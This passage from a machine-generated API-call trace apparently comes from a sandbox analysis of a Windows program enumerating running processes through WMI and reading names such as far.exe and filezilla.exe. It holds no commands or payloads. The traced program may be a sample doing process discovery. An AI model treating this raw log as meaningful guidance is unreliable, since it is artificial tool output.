plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3216\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.124] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3216\"") returned 0x5e [0265.124] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3216\"") returned 0x5e [0265.124] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.124] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.124] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.125] IUnknown:Release (This=0x601a94) returned 0x1 [0265.125] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.126] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515148) returned 0x0 [0265.126] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515148) returned 0x0 [0265.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.126] WbemDefPath:IUnknown:AddRef (This=0x5515148) returned 0x3 [0265.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5522e40) returned 0x0 [0265.127] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5522e40, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.127] WbemDefPath:IUnknown:Release (This=0x5522e40) returned 0x3 [0265.127] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.127] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.127] WbemDefPath:IUnknown:Release (This=0x5515148) returned 0x2 [0265.127] WbemDefPath:IUnknown:Release (This=0x5515148) returned 0x1 [0265.127] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.127] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515148, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515148) returned 0x0 [0265.127] WbemDefPath:IUnknown:AddRef (This=0x5515148) returned 0x3 [0265.127] WbemDefPath:IUnknown:Release (This=0x5515148) returned 0x2 [0265.127] WbemDefPath:IWbemPath:SetText (This=0x5515148, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3216\"") returned 0x0 [0265.127] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.128] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.128] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.128] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.128] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.128] IWbemClassObject:Get (in: This=0x551ef40, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d7080*=0, plFlavor=0x23d7084*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x23d7080*=8, plFlavor=0x23d7084*=0) returned 0x0 [0265.128] SysStringByteLen (bstr="far.exe") returned 0xe [0265.128] SysStringByteLen (bstr="far.exe") returned 0xe [0265.128] IWbemClassObject:Get (in: This=0x551ef40, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d7080*=8, plFlavor=0x23d7084*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x23d7080*=8, plFlavor=0x23d7084*=0) returned 0x0 [0265.128] SysStringByteLen (bstr="far.exe") returned 0xe [0265.129] SysStringByteLen (bstr="far.exe") returned 0xe [0265.129] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0265.129] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x551ff30, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.130] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551ff30) returned 0x0 [0265.130] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.130] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.130] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.130] IUnknown:AddRef (This=0x551ff30) returned 0x3 [0265.130] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.130] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.130] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551ff34) returned 0x0 [0265.130] IMarshal:GetUnmarshalClass (in: This=0x551ff34, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.131] IUnknown:Release (This=0x551ff34) returned 0x3 [0265.131] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.131] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.131] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.131] IUnknown:Release (This=0x551ff30) returned 0x2 [0265.131] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.131] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.131] IUnknown:QueryInterface (in: This=0x551ff30, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551ff30) returned 0x0 [0265.131] IUnknown:AddRef (This=0x551ff30) returned 0x4 [0265.131] IUnknown:Release (This=0x551ff30) returned 0x3 [0265.131] IUnknown:Release (This=0x551ff30) returned 0x2 [0265.131] CoTaskMemFree (pv=0x54ba2c8) [0265.131] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.131] IUnknown:AddRef (This=0x551ff30) returned 0x3 [0265.131] IWbemClassObject:Get (in: This=0x551ff30, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.132] IWbemClassObject:Get (in: This=0x551ff30, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3004\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.132] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x5e [0265.132] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x5e [0265.132] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.132] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.132] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.132] IUnknown:Release (This=0x601a94) returned 0x1 [0265.133] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.133] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.133] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515378) returned 0x0 [0265.133] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.133] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515378) returned 0x0 [0265.134] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.134] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.134] WbemDefPath:IUnknown:AddRef (This=0x5515378) returned 0x3 [0265.134] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.134] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.134] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5522f00) returned 0x0 [0265.134] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5522f00, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.134] WbemDefPath:IUnknown:Release (This=0x5522f00) returned 0x3 [0265.134] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.134] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.134] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.134] WbemDefPath:IUnknown:Release (This=0x5515378) returned 0x2 [0265.134] WbemDefPath:IUnknown:Release (This=0x5515378) returned 0x1 [0265.134] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.135] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.135] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515378, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515378) returned 0x0 [0265.135] WbemDefPath:IUnknown:AddRef (This=0x5515378) returned 0x3 [0265.135] WbemDefPath:IUnknown:Release (This=0x5515378) returned 0x2 [0265.135] WbemDefPath:IWbemPath:SetText (This=0x5515378, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x0 [0265.135] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.135] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.135] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.156] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.156] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.157] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.157] IWbemClassObject:Get (in: This=0x551ff30, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d78fc*=0, plFlavor=0x23d7900*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x23d78fc*=8, plFlavor=0x23d7900*=0) returned 0x0 [0265.157] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0265.157] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0265.157] IWbemClassObject:Get (in: This=0x551ff30, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d78fc*=8, plFlavor=0x23d7900*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x23d78fc*=8, plFlavor=0x23d7900*=0) returned 0x0 [0265.157] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0265.157] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0265.157] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0265.157] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x551f270, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.158] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551f270) returned 0x0 [0265.159] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.159] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.159] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.159] IUnknown:AddRef (This=0x551f270) returned 0x3 [0265.159] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.159] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.159] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551f274) returned 0x0 [0265.159] IMarshal:GetUnmarshalClass (in: This=0x551f274, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, 